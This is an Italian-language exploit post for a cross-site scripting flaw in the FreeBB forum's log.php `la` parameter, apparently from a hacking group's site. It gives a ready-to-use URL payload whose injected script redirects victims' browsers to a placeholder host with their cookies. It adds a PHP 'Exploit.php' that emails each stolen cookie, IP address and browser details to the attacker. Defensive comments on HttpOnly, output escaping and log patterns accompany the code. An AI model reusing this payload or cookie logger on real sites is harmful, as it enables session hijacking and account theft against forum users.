/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'
• Xss Freebb ( All Version )
• Author: SpiderZ
• Sito: http://www.spiderz.altervista.org
• Sito2: https://www.spiderz.netsons.org
XSS in FreeBB (parametro `la` di log.php)
Sito ufficiale FreeBB: http://www.free-bb.com/fr/
Url : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma
XSS
nrw&la=">><script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>
Url + xss : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma?nrw&la=">><script>document.location.replace('http://WWW.SITOWEB.COM/FILE.php?c='+document.cookie);</script>
Log cookie ( Exploit.php )
<?php
// Receiving end of the payload shown above: the injected script redirects the
// browser to this file with document.cookie in the `c` query parameter, and
// this script mails that value, together with request metadata, to one address.
//
// Defender's reading of this listing:
// - document.cookie only exposes cookies that were set without the HttpOnly
//   attribute, so a session cookie marked HttpOnly never reaches `c`.
//   NOTE(review): whether the forum sets HttpOnly is not shown here; confirm.
// - The root cause sits in the forum's log.php, which presumably writes the
//   `la` parameter into the page without HTML-escaping it; the fix belongs
//   there (context-aware output encoding, e.g. htmlspecialchars with ENT_QUOTES).
// - In web-server or proxy logs, look for log.php requests whose `la` value
//   contains markup (`">`, `<script`), and for browser navigations to an
//   external host whose query string carries cookie text in a `c=` parameter.

// Metadata of the request that followed the redirect: client address,
// User-Agent header and Accept-Language header.
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
// Value appended by the injected script: the browser's document.cookie string.
$cookie = $_GET['c'];
// Placeholder; used below both as the recipient and as the From address.
$myemail = "LA TUA E-MAIL";
// Human-readable timestamp in the server's configured timezone.
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss fre-bb" ;
// Plain-text report body. $base is not assigned anywhere in this listing,
// so the "Url:" line is left empty.
$message = "Xss free-bb
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Lingua: $accept
Url: $base
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
// Sends the report through the host's mail() transport; nothing is written to
// disk and no response body is produced, so the request itself (path plus the
// `c` parameter) is the main trace on the receiving server.
mail($myemail, $subject, $message, $from);
?>
Modifica : $myemail = "LA TUA E-MAIL";